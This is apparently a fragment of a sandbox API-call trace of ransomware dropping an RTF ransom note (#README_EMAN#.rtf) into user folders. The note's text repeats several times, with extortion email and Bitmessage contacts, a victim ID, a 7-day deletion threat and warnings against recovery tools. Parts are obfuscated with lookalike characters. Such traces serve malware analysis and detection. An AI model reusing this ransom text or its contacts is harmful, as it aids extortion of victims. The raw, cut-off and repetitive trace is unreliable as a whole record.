\r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nEwJVUzEVMBMGA1UEChMMRGl\x93/", lpUsedDefaultChar=0x0) returned 8717 [0298.798] WriteFile (in: hFile=0x27c, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0298.799] CloseHandle (hObject=0x27c) returned 1 [0298.799] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\#readme_eman#.rtf")) returned 0xffffffff [0298.799] GetLastError () returned 0x2 [0298.799] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\en-gb\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\en-gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0298.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0298.800] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 